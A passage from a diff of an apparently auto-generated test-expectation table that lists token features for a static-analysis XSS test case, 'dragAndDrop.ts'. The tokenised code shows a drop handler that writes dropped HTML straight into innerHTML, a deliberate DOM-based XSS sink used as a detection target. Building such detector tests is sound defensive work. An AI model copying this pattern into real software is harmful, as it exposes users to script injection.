drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:29 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:29 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:29 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:29 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:37 | dataTransfer.getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:37 | dataTransfer.getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:37 | dataTransfer.getData | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:37 | dataTransfer.getData | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:37 | dataTransfer.getData | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | dataTra ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | dataTra ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | dataTra ... plain') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | dataTra ... plain') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | dataTra ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | exceptional return of dataTra ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | exceptional return of dataTra ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | exceptional return of dataTra ... plain') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | exceptional return of dataTra ... plain') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:18:7:51 | exceptional return of dataTra ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:31:7:37 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:31:7:37 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:31:7:37 | getData | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:31:7:37 | getData | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:31:7:37 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:39:7:50 | 'text/plain' | CalleeFlexibleAccessPath | dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:39:7:50 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:39:7:50 | 'text/plain' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13384,11 +99392,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:39:7:50 | 'text/plain' | enclosingFunctionName | drop | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:39:7:50 | 'text/plain' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:7:39:7:50 | 'text/plain' | receiverName | dataTransfer | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:14 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:14 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:14 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:14 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:14 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html = ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html = ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html = ... /html') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html = ... /html') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:11:8:50 | html = ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:29 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:29 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:29 | dataTransfer | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:29 | dataTransfer | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:29 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:37 | dataTransfer.getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:37 | dataTransfer.getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:37 | dataTransfer.getData | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:37 | dataTransfer.getData | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:37 | dataTransfer.getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | enclosingFunctionName | drop | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | exceptional return of dataTra ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | exceptional return of dataTra ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | exceptional return of dataTra ... /html') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | exceptional return of dataTra ... /html') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:18:8:50 | exceptional return of dataTra ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:31:8:37 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:31:8:37 | getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:31:8:37 | getData | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:31:8:37 | getData | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:31:8:37 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:39:8:49 | 'text/html' | CalleeFlexibleAccessPath | dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:39:8:49 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:39:8:49 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13397,6 +99440,121 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:39:8:49 | 'text/html' | enclosingFunctionName | drop | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:39:8:49 | 'text/html' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:8:39:8:49 | 'text/html' | receiverName | dataTransfer | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:13 | !text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:13 | !text | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:13 | !text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:13 | !text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:13 | !text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:22 | !text && !html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:22 | !text && !html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:22 | !text && !html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:22 | !text && !html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:9:9:22 | !text && !html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:10:9:13 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:18:9:22 | !html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:18:9:22 | !html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:18:9:22 | !html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:18:9:22 | !html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:18:9:22 | !html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:9:19:9:22 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | e | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | e | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | html | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | html | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | text | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | text | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | text | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | text | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:5 | text | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:20 | e.preventDefault | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:20 | e.preventDefault | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:20 | e.preventDefault | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:20 | e.preventDefault | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:20 | e.preventDefault | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | e.preventDefault() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | e.preventDefault() | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | e.preventDefault() | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | e.preventDefault() | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | e.preventDefault() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | exceptional return of e.preventDefault() | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | exceptional return of e.preventDefault() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | exceptional return of e.preventDefault() | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | exceptional return of e.preventDefault() | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:5:11:22 | exceptional return of e.preventDefault() | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:7:11:20 | preventDefault | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:7:11:20 | preventDefault | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:7:11:20 | preventDefault | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:7:11:20 | preventDefault | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:11:7:11:20 | preventDefault | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:13 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:13 | div | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:13 | div | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:13 | div | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:13 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div = d ... ('div') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div = d ... ('div') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div = d ... ('div') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div = d ... ('div') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:11:13:45 | div = d ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:24 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:24 | document | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:24 | document | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:24 | document | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:24 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:38 | documen ... Element | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:38 | documen ... Element | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:38 | documen ... Element | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:38 | documen ... Element | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:38 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | documen ... ('div') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | documen ... ('div') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | documen ... ('div') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | documen ... ('div') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | documen ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | exceptional return of documen ... ('div') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | exceptional return of documen ... ('div') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | exceptional return of documen ... ('div') | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document createElement div html div innerHTML html div textContent text document body append div | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | exceptional return of documen ... ('div') | enclosingFunctionName | drop | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:17:13:45 | exceptional return of documen ... ('div') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:26:13:38 | createElement | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:26:13:38 | createElement | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:13:26:13:38 | createElement | enclosingFunctionBody | e dataTransfer e originalEvent dataTransfer text dataTransfer getData text/plain html dataTransfer getData text/html text html e preventDefault div document 